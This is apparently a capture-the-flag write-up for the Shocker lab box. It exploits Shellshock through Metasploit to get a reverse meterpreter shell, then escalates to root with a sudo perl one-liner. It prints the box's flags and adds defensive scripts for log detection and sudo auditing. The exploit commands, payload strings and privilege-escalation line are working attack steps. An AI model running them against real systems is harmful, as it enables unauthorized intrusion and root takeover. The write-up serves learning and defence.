# Nmap
Nmap shows port 80 open:

```
nmap -sC -sV -p-65535 --script vuln 10.10.10.56

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 379.45 seconds
```
# Go to the WebApp:
We are greeted by a page that shows nothing but a bug image.
## Page source:
```html
<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">
</body>
</html>
```
# Finding and Exploiting Shellshock
```
msf6 > search shellshock

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/apache_mod_cgi_bash_env   2014-09-24       normal  Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
```
The following is the output of running the scanner module above against the target URI *http://10.10.10.56/cgi-bin/user.sh*. The module reports the output of the injected `id` command, which confirms the CGI script is vulnerable:
```
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit

[+] uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Searching for a suitable Shellshock exploit:
```
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   1   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   2   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   3   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)
   4   exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   5   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   6   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   7   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution
   8   exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
   9   exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   10  exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)
   11  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)

Interact with a module by name or index. For example info 11, use 11 or use exploit/unix/smtp/qmail_bash_env_exec
```
Using the *show info* command, I found a suitable exploit for our case:
```
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show info 5

       Name: Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
     Module: exploit/multi/http/apache_mod_cgi_bash_env_exec
   Platform:
       Arch:
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-09-24

Provided by:
  Stephane Chazelas
  wvu <[email protected]>
  juan vazquez <[email protected]>
  lcamtuf

Available targets:
  Id  Name
  --  ----
  0   Linux x86
  1   Linux x86_64

(removed some info)

Payload information:
  Space: 2048

Description:
  This module exploits the Shellshock vulnerability, a flaw in how the
  Bash shell handles external environment variables. This module
  targets CGI scripts in the Apache web server by setting the
  HTTP_USER_AGENT environment variable to a malicious function
  definition.

References:
  https://cvedetails.com/cve/CVE-2014-6271/
  https://cvedetails.com/cve/CVE-2014-6278/
  https://cwe.mitre.org/data/definitions/94.html
  OSVDB (112004)
  https://www.exploit-db.com/exploits/34765
  https://access.redhat.com/articles/1200223
  https://seclists.org/oss-sec/2014/q3/649

Also known as:
  Shellshock
```
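The module description above explains the mechanism: Apache's mod_cgi copies request headers into environment variables (User-Agent becomes `HTTP_USER_AGENT`), and an unpatched bash that imports a variable beginning with `() {` also executes what follows the function body. That same `() {` prefix is what a defender can look for. The script below is an added example, not part of the writeup or of Metasploit: it parses Apache combined-format access log lines (the sample lines are constructed, not taken from the box) and flags any request whose Referer or User-Agent carries the function-definition prefix. The regex-based log parser and the `Hit` record are assumptions of this example.

```python
import re
from typing import List, NamedTuple

# Apache "combined" log format:
#   host ident user [time] "request" status size "referer" "user-agent"
# Quoted fields may contain \" escapes, so each one is matched as (?:[^"\\]|\\.)*.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) (\S+) ' + QUOTED + ' ' + QUOTED + '$'
)

# Shellshock trigger: a value that starts with a bash function definition "() {".
# Unpatched bash importing such a variable also runs whatever follows the "}".
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


class Hit(NamedTuple):
    host: str
    time: str
    request: str
    field: str     # which header carried the pattern: "referer" or "agent"
    value: str


def header_looks_like_shellshock(value: str) -> bool:
    """True if a header value carries the bash function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_access_log(lines) -> List[Hit]:
    """Return one Hit per combined-format line whose Referer or User-Agent
    carries the Shellshock pattern. Lines that do not parse are skipped."""
    hits: List[Hit] = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue
        host, when, request, _status, _size, referer, agent = m.groups()
        for field, value in (("referer", referer), ("agent", agent)):
            if header_looks_like_shellshock(value):
                hits.append(Hit(host, when, request, field, value))
    return hits


# Constructed sample log lines (not from the box): one benign request, one with the
# pattern in User-Agent (the header the msf module uses) and one with it in Referer.
SAMPLE_LOG = [
    '10.10.14.4 - - [07/Apr/2021:10:01:40 -0400] "GET / HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '10.10.14.4 - - [07/Apr/2021:10:01:55 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "-" "() { :;}; /bin/echo marker"',
    '10.10.14.4 - - [07/Apr/2021:10:01:58 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "() { :;}; /bin/echo marker" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit.time} {hit.host} {hit.request!r}: shellshock pattern in {hit.field}: {hit.value!r}")
```

Only the headers that reach the combined log are checked here; the vulnerability applies to any request header mod_cgi exports, so an inline check at the web server or WAF (and patching bash) is the real mitigation, while this scan is for finding attempts after the fact.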
In the following lines I select the exploit module, set the required options and run it, which results in a meterpreter session:
```
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI http://10.10.10.56/cgi-bin/user.sh
TARGETURI => http://10.10.10.56/cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.4:1234
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (980808 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.4:1234 -> 10.10.10.56:57692) at 2021-04-07 10:02:11 -0400
```
In the following section I have:
* checked which user I am logged in as
* moved to that user's home directory and listed its files, finding the user flag
* run *sudo -l* to check the sudoers configuration for misconfigurations; we can privesc with perl
```
meterpreter > shell
Process 1530 created.
Channel 1 created.
ls
user.sh
whoami
shelly
cd
ls
user.txt
cat user.txt
3b52250728977779d192b0262d2c2d7e
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
sudo perl -e 'exec "/bin/bash"'
whoami
root
cd /root/
ls
root.txt
cat root.txt
f77dc0ce91af01ad16326409e1d05b68
```
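The root step works because `(root) NOPASSWD: /usr/bin/perl` hands out an interpreter that runs arbitrary code, which is the same as handing out a root shell. An administrator can catch this class of rule before it is abused by grading `sudo -l` output. The script below is an added example, not part of the writeup: it parses `sudo -l` output (the sample mirrors the box's rules plus a constructed harmless rule), splits each rule into run-as user, tags and commands, and rates a rule "high" when a code-executing binary or `ALL` is runnable as root without a password. The `CODE_EXECUTING` set, the `Finding` record and the severity labels are assumptions of this example.

```python
import os
import re
from typing import List, NamedTuple

# One rule line as printed by `sudo -l`:  (runas[ : group]) [TAG: ...] command[, command...]
RULE_RE = re.compile(r'^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')

# Interpreters and shells: each runs arbitrary code by design, so a root rule on any
# of them is equivalent to an unrestricted root shell. (Assumed list for this example.)
CODE_EXECUTING = {"perl", "python", "python3", "ruby", "bash", "sh", "dash", "zsh"}


class Finding(NamedTuple):
    runas: str
    command: str
    nopasswd: bool
    severity: str   # "high", "medium" or "info"


def classify(runas: str, command: str, nopasswd: bool) -> str:
    """Grade one (runas, command) pair: root + code execution is the dangerous case."""
    users = [u.strip() for u in runas.split(":")[0].split(",")]
    as_root = "ALL" in users or "root" in users
    binary = os.path.basename(command.split()[0])
    if command == "ALL" or (as_root and binary in CODE_EXECUTING):
        return "high" if nopasswd else "medium"
    return "info"


def audit_sudo_l(output: str) -> List[Finding]:
    """Parse `sudo -l` output and return one graded Finding per command."""
    findings: List[Finding] = []
    in_rules = False
    for raw in output.splitlines():
        line = raw.strip()
        # Rules start after the "User X may run the following commands" header.
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for command in (c.strip() for c in m.group("cmds").split(",")):
            if command:
                findings.append(Finding(m.group("runas"), command, nopasswd,
                                        classify(m.group("runas"), command, nopasswd)))
    return findings


# Constructed sample: the box's rule plus one harmless, password-protected rule.
SAMPLE_SUDO_L = r"""Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/apt-get update, /usr/bin/apt-get upgrade
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        tag = "NOPASSWD" if f.nopasswd else "password"
        print(f"[{f.severity:6}] ({f.runas}) {tag}: {f.command}")
```

The fix on the sudoers side is to drop the rule, or to allow only a specific script with fixed arguments rather than the interpreter itself; a rule that names perl, python or a shell cannot be made safe by adding a password prompt, which only downgrades the finding from "high" to "medium" here.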